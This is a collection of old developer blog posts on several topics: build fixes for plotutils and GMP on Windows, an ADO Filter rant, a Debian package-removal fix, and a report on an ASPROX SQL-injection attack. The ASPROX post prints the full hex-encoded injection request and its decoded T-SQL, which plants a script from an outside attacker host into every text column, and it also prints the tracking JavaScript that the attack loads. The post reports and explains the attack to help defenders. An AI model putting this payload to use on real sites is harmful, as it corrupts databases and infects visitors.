I was just compiling the GNU plotutils library (version 2.6) using MSYS for MinGW, and had the following problematic error:

undefined reference to `signgam'

It turns out there are problems with the 'gauss' methods provided by various platforms: in the file specfun.c in the ode directory of the plotutils source, the following comment occurs:

/* The following gamma-related nonsense is necessary because (1) some
   vendors have lgamma(), some have gamma(), and some have neither [see
   include/sys-defines.h for further comments], (2) some vendors do not
   declare whichever function they have [e.g. Irix 5.3 requires an
   auxiliary preprocessing symbol to be defined for the declaration in
   math.h to be visible], and (3) some vendors supply broken versions which
   we can't use [e.g. AIX's libm.a gamma support is conspicuously broken],
   so we need to link in a replacement, but we can't use the same name for
   the external symbol `signgam'.  What a mess! -- rsm */

There are some threads discussing ways of solving this in old versions, and apparently only with Cygwin; however, I found that the simplest way to solve the problem is to make use of the C macro NO_SYSTEM_GAMMA referenced in the plotutils source - the package will then declare its own gamma functions for us. (So in fact, this isn't an error with plotutils, it's plotutils that provides the solution!)

The fix: make clean the directory and then run configure with an additional flag for the compiler defining the variable NO_SYSTEM_GAMMA. For example:

./configure --prefix=/where/to/install CFLAGS="-DNO_SYSTEM_GAMMA" --enable-libplotter

Then running make, make check and make install as usual, you should be good to go!

Remark: I actually had problems with the make check phase, which reported errors (8 of 11 failures, in fact!) when the relevant files (the .out and .xout files in the test directory) seemed to match. I recommend not worrying/bothering with these unless you have problems, or spot a potential future problem.

Other remark: The --enable-libplotter switch for the configure command is only needed if you want to use the C++ wrapper!

Yes, OK, I know. VB6 is a dead, bloated monster, as in fact is my edition of the ADO controls. But we have to use them for this project.

And my God, it's funny how terrible it is.

My latest 1-hour-scratching-your-head puzzle is purely an ADO thing. Now, I was designing the interface for filtering a table of appointments, based on Staff Name and/or text in the Appointment Memo or Appointment Type (amongst various other options).

The strategy is building a string for the Filter property of the Recordset. So first I test it with a Staff name. Great! It picks up the not-blank, substitutes it into the SQL filter, and shows the new list.

Now, let's test the Memo/Type filter. Great! It only shows appointments with memos or types containing "Software".

So let's test them both together.

BIG MISTAKE. Runtime Error 3001: Arguments are of the wrong type, are out of acceptable range, or are in conflict with each other.

So I sit there, scratching my head, wrapping things in multiple parantheses to ensure that I'm not accidentally AND-ing together two strings or something. No joy.

So I start searching the internet. 14,000 results. Oh, good. Not just me then.

But there happen to be *thousands* of different ways of generating this error.

Anyway, I eventually track down this ancient, shelved Microsoft Help and Support document. Guess what?

"...Though there is no precedence for AND and OR, the ADO Filter property does not allow you to group OR clauses within parentheses and AND clauses without parentheses...."

That is, the syntax "(cond1 OR cond2) AND cond3" is illegal.

Yep.

Totally illegal.

The article helpfully suggests the following alternatives:

• "(cond1 AND cond2) OR cond3"
• "(cond1 OR cond2) OR cond3"
• "(cond1 AND cond2) AND cond3"

... before pointing out that "... the rules of logic result in very different results ...". No sh*t, Sherlock. We should, in fact, "Be sure that your two filter statements are logically equivalent." What an idea(!)

It finishes by pointing out that "(cond1 OR cond2) AND cond3" is equivalent to "(cond1 AND cond3) OR (cond2 AND cond3)". Thanks. They can expand Boolean brackets!

'ho's a clever boy 'en?

Of course, this isn't that helpful if you don't know how many AND conjunctions you're going to be making. In fact, it's damn near useless without writing a function that expands the brackets at runtime.

Oh wait, it *hasn't* quite finished yet.

Status: This behavior is by design.

Well that's just f***ing perfect.

As to the VB6 side of things, check out this hilarious article by Dr. Dobb, written in 2000. Yes, yet all of the issues remain relevant.

And funny.

V - peace. 

Some computer network is trying to SQL-inject stuff (include JavaScript files) into this website, using an oldish (April or earlier) exploit, aimed at ASP and T-SQL. Chinese (mainly Beijing, actually, amusingly), American, Canadian, even Belgian server are using a certain GET request to spread what I think is a csrss-style virus.

The GET request is

/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which translates as an attempt to inject SQL of

DECLARE @S CHAR(4000);
SET @S=CAST(0x4445... AS CHAR(4000));
EXEC(@S);

The long hexadecimal string is

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Which is to say, into every string field everywhere, append an inclusion of the JavaScript script http://sdo.1000mg.cn/csrss/w.js which looks like this:

window.onerror=function(){return true;}
if(typeof(js86eus)=="undefined")
{
var js86eus=1;
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');
var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");
}else{
}
}
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}
 

So there we go.

Edit: ASPROX

I have just discovered the name of this attack: originally, and probably still, this was part of the so-called ASPROX attack. See http://hostmonsterforums.com/showthread.php?t=3949 for background, and http://www.networkcloaking.com/ASPROX_Toolkit.pdf for an excessive analysis of both the attack and various fixes.

Also, http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx has a fix (see its comments too).

The recommended starting point for anyone dealing with this, or merely interested in it, is certainly this July Guardian Technology blog (skip the intro and read the bottom bits). Also, this Microsoft Security Advisory has several useful links under Suggested Actions and then Additional Information.

Rant

Just as a general comment: people, SQL Injection is a stupid standard line of attack which ALL SOFTWARE run on all computers should defend against. All forms, all URL GET requests - if it goes to the server, escape it! We should have stopped this _years_ ago. Yet ASP seems to make it very difficult to fix, and some server-side software packages seem to ship with this blindingly serious error. Which can effectively allow someone complete control of the whole MySQL server, and (if this app isn't chrooted to a chroot jail and otherwise contained) of the whole logical server.

For the love of God people, ESCAPE! 

What is GMP?

The GNU Multi-Precision library, or GMP, is an essential component of the programmer who works with mathematics on a regular basis. The problem is, C and C++ only come with data types with fixed sizes (int, long, double, etc.), which severely limits the size of number which can be kept in memory.

The GMP library allows you to store arbitrary precision numbers (both integers and floats) with ease - indeed, with the C++ extension, GMPXX, allows you to use these data types in pretty much exactly the same way as you use, say long.

What is this guide for?

If you're working on Windows (instead of Ubuntu :)), and using Dev-C++ (a fantastic open source C/C++ compiler available under the GPL, which makes it free), then this guide should be straight forward, and works just great with these software versions:

If there are no errors, then this guide should work straightforwardly. If there are errors, ask about them below. Whenever you want, even if this entry is really old. We'll try, but no guarantees.

The Instructions

Starting Point

You should have Dev-C++ installed. No? Then click here. The assumed installation directory is C:\Dev-Cpp\. Be aware of this when adapting the commands below.

The installation of Dev-C++ should have put "C:\Dev-Cpp\bin" in your PATH environment variable. To check this, go to Start->Run, type "cmd", and press return. Now type "gcc --version". You should get a message like this:

gcc (GCC) 3.4.2 (mingw-special)
Copyright (C) 2004 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

If you get a message like "'gcc' is not recognized as an internal or external command, operable program or batch file.", and you are sure you have installed Dev-C++ on Windows XP: right click on My Computer and select Properties. Click on the Advanced tab, and then click on the Environment Variables button. Look for "Path" in the bottom white box, scrolling down if necessary. Select it, click on "Edit", and go to the end of the box which appears. Add ";C:\Dev-Cpp\bin", including the semi-colon, and adjusting the "C:\Dev-Cpp" bit to whatever directory you installed Dev-C++ into.

The Preparation

1. Go to the GMP download page. Download the archive of the latest release, a ".tar.bz2" or ".tar.gz" file - which one is irrelevant.
2. Extract this archive to a folder like "c:\c++\GMP" or something - try to avoid spaces and capital letters. To do this, you need a good archive program - if you haven't got one that can read the file (i.e. you double-click on it and it says "Windows cannot open this file"), download and install 7-Zip (from here).
3. Check that you have a folder like "C:\c++\GMP\GMP-4.2.1", or equivalent. This folder should contain several source files and folders.
4. Assuming you have MinGW installed (it comes with Dev-C++), you only now need MSYS to run the "configure" script. To install this
   1. Go to the SourceForge MinGW homepage.
   2. Click on "Download MinGW - Minimalist GNU for Windows" - the big green button!
   3. Look through the "Latest File Releases" section until you see "MSYS Base System". Click on the text saying "MSYS Base System" - not the "Download" link!
   4. Find the first "Current Release" in the list in the big table, ignoring "Technology Previews", by preference. (NB: You can close any "Technology Preview" sections by clicking on the '-' symbol to the left of the heading.)
   5. Click the '+' symbol by the Current Release, which is "Current Release: msys-1.0.10" at the moment.
   6. Click on "MSYS-1.0.10.exe" (or whatever the latest version is - what is important is the ".exe" extension).
5. Run this file - the default options should be fine.
6. When it finishes the installation, a black prompt window appears. Confirm that you do want to normalize, and that you have a MinGW installation (type 'y' and press return), and then type in the folder where you have Dev-C++ installed, using forward slashes and lowercase: for me, that is "c:/dev-cpp". Press return.
7. Go to "C:\Dev-Cpp\bin" (or equivalent) and make a copy of "mingw32-make.exe". Rename this copy "make.exe". This is because the MSYS installation removes "make.exe" without the prefix, causing Dev-C++ to become confused when trying to compile using a makefile.

You are now ready to compile! :D

Compilation & Installation

1. Open the MSYS prompt (by default, there is a link in the Start Menu - Start->MinGW->MSYS->msys).
2. Update: "cd" to the directory with your GMP files using a command like "cd /c/c++/GMP/GMP-4.2.1" (yes, of course, without the quotes, as always!) - be sure to adjust "/c/..." to your own directory - this one is equivalent to C:\c++\GMP\GMP-4.2.1. Press return.
3. Update fix: You must fix an error which currently exists in the Makefiles. You must do one of the following:
   1. Before running ./configure (step 4), go to C:\c++\GMP\GMP-4.2.1\mpn\Makeasm.am and go to the last line of the file. If you find --m4="$(M4)" in the middle of it, change it to --m4=$(M4). That is, remove the double quote marks,
   2. After running ./configure (step 4), go to C:\c++\Includes\GMP\GMP-4.2.1\mpn\Makefile and also C:\c++\Includes\GMP\GMP-4.2.1\tests\Makefile and make the same replacements described just above, although not quite at the last line. Change --m4="$(M4)" to --m4=$(M4).
4. Type in "./configure --prefix=/c/dev-cpp --enable-cxx" (yes, no quotes, and change the path as in 2. above) - and press return. Let it run - it is analyzing your system, and building the Makefiles necessary.
5. Providing there are no errors (if there are, ask someone about them, or try to use your common sense to fix them - most errors are misspelt or incorrectly written directory names) type in "make" and press return. Let this run also - it's now compiling and linking all the code, which may take quite a while. The process compiles each source file in each category (integers, floats, etc. - as in the folder structure), producing .o and .lo files, and then links them each folder together into individual .la files.
6. When this had finished, in my paranoia, I also ran "make check", which compiles various tests and runs them using your new (static) library. They all passed first time :P. It is recommended that you run "make check" though, since, as the GMP developers say, GMP tends to explore interesting corners of compilers, and many have fallen foul of compiler errors.
7. Update: type "make install" and press return.
8. (Update: you should check to ensure the ".a" libraries have been installed to your Dev-C++ directory, as in "C:\Dev-Cpp\lib". If they haven't, look for a ".libs" folder in the directory you extracted everything to.)

Now you should be ready to use the static library!

Using the Library

1. Now, open Dev-C++, and create a new C++ project (a Console Application).
2. Type in this code into "main.cpp" and save it:

   	#include <iostream>
   	#include <gmpxx.h>
   	using namespace std;
   	int main (void) {
   	mpz_class a, b, c;
   	a = 1234;
   	b = "-5678";
   	c = a+b;
   	cout << "sum is " << c << "\n";
   	cout << "absolute value is " << abs(c) << "\n";
   	cin >> a;
   	return 0;
   	}
   	

3. Go to Project->Project Options->Parameters->Linker, click "Add Library or Object", and navigate to "C:\Dev-Cpp\lib". Select the "libgmpxx.a" file, and click "Open". A new entry has appeared. Do the same, but selecting "libgmp.a". The order is important!
4. Click OK, and compile!

A Brief Explanation

MSYS is necessary to run the "configure" shell script, and to provide the ideal environment for building. It is easier to use than Cygwin for this purpose, and quicker to install.

The "--enable-cxx" flag for the "configure" script is to allow the linking of the "libgmpxx" library, and to cause the copying of "gmpxx.h" to the installation directory.

When using GMPXX in C++, the following course of action is required:

1. #include <gmpxx.h>
2. libgmpxx.a
3. libgmp.a

For the C version, it's:

1. #include <GMP.h>
2. libgmp.a

The C++ version overloads the operators (+, -, /, *, =, ...) to make using the library as easy as using built in operators, as the above example demonstrates. The data types in the C++ wrapper as as follows:

mpz_class: Integers, or whole numbers

mpf_class: Floats, or decimal numbers

mpq_class: Rational numbers, or fractions

Enjoy!

Useful? Problems?

Please leave a comment (it's really easy) if this was useful, if you had problems, or especially if you have something to add!

Recent Fix No. 1:

If you get an error like

m4: gcc: No such file or directory

../mpn/m4-ccas: -c: command not found
c:\dev-cpp\bin\make.exe[2]: *** [add_n.lo] Error 1
c:\dev-cpp\bin\make.exe[2]: Leaving directory `c:/c++/GMP/GMP-4.2.3/mpn\'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `c:/c++/GMP/GMP-4.2.3\'
c:\dev-cpp\bin\make.exe: *** [all] Error 2

then go to Step 3 under Compilation & Installation above.

(See this forum thread for information.)

Recent Fix No. 2

If you're getting errors like these:

../fib_table.h:4: error: parse error before "data"
../gmp-impl.h:2547:64: operator '&&' has no right operand

Check the definition of things like GMP_LIMB_BITS in gmp.h - if they're blank, give them a nice value, such as 32 (no guarantees.) Also, read the comments below.

OK. Here's the solution to a really annoying problem relating to the Debian APT tool - that package that just won't uninstall for love nor money. I eventually solved it with a little bit of thinking... when I was thinking in the right way about it!

The scenario

Firstly, you get a fairly standard error message, e.g. referring to a non-existent file (typically the init.d file). Then, it triggers the subprocess pre-removal script returned error exit status 1 error. Thus, you get the wonderful E: Sub-process /usr/bin/dpkg returned an error code (1) to top it off. My problem, as the example above suggests, was that I accidentally deleted the init.d script.

What is happening is that the Debian package manager (dkpg) is running the "pre-removal script" found in the /var/lib/dkpg/info/ folder. This will be named [package].prerm. Typically, this is a brief script which manages the stopping of processes, chmod instructions, and deletes/renames certain package files. By all means, have a look in the file.

The solution

To resolve this problem (at your own risk), simply edit the /var/lib/dkpg/info/[package].prerm file, removing troublesome lines, or even, if necessary, simply emptying (but not deleting) the whole file. This allows the process to continue, and the files to be removed.

Having allowed the package to be removed, you may have problems with re-installation - so even if you do not plan on doing so, you may be well advised to tidy up the files - this is simply done by renaming (rather than deleting, for safety) the remaining [package]. files in the /var/lib/dkpg/info/ folder, to, for example, [package].postrm.old. The files likely to be left behind are the .postrm (post-removal script) and the .list (file list) files. These can safely be renamed, since any re-installation will simply replace them with fresh files.

A footnote

If you want a motto, try "everything Linux does makes sense". The script files are easily reachable to ensure you can fix any little bugs you find or create.

And something else I learned recently relating to APT - if you want to search repositories from the command-line, try "apt-cache search ...".